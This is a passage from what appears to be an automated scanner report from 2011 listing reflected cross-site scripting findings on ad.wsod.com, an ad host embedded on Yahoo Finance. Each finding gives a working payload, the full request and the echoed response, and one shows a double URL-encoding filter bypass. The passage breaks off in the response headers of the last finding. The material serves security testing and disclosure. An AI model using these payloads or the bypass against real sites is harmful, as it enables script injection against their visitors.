Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ee26d"><script>alert(1)</script>3c4129e8ac6http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.115. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9c5"-alert(1)-"809976504ec was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ba9c5"-alert(1)-"809976504ec HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2609

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ba9c5"-alert(1)-"809976504ec">
...[SNIP]...

1.116. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b01df"-alert(1)-"47e327ecc57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&b01df"-alert(1)-"47e327ecc57=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2615

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&b01df"-alert(1)-"47e327ecc57=1">
...[SNIP]...

1.117. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d34e8"><script>alert(1)</script>2724b554218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&d34e8"><script>alert(1)</script>2724b554218=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2645

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*&d34e8"><script>alert(1)</script>2724b554218=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.118. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [ybt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87684</script><script>alert(1)</script>1e254befa33 was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;831987684</script><script>alert(1)</script>1e254befa33&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830217**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;831987684</script><script>alert(1)</script>1e254befa33&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208
...[SNIP]...

1.119. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yhdata parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fd3</script><script>alert(1)</script>d040a102cf7 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=20fd3</script><script>alert(1)</script>d040a102cf7&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:35:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829720**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=20fd3</script><script>alert(1)</script>d040a102cf7&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAAB
...[SNIP]...

1.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [yyob parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5782</script><script>alert(1)</script>d07eafa992e was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=e5782</script><script>alert(1)</script>d07eafa992e&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:39:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829941**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=e5782</script><script>alert(1)</script>d07eafa992e&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=
...[SNIP]...

1.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca9e3</script><script>alert(1)</script>dcdf9dea63f was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,ca9e3</script><script>alert(1)</script>dcdf9dea63f&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830138**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,ca9e3</script><script>alert(1)</script>dcdf9dea63f&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8Um
...[SNIP]...

1.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee69%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cd7641fbe8 was submitted in the REST URL parameter 2. This input was echoed as 3ee69"><script>alert(1)</script>2cd7641fbe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573ee69%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cd7641fbe8/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573ee69"><script>alert(1)</script>2cd7641fbe8/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1037%2522%253balert%25281%2529%252f%252f320359448bd was submitted in the REST URL parameter 2. This input was echoed as a1037";alert(1)//320359448bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357a1037%2522%253balert%25281%2529%252f%252f320359448bd/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

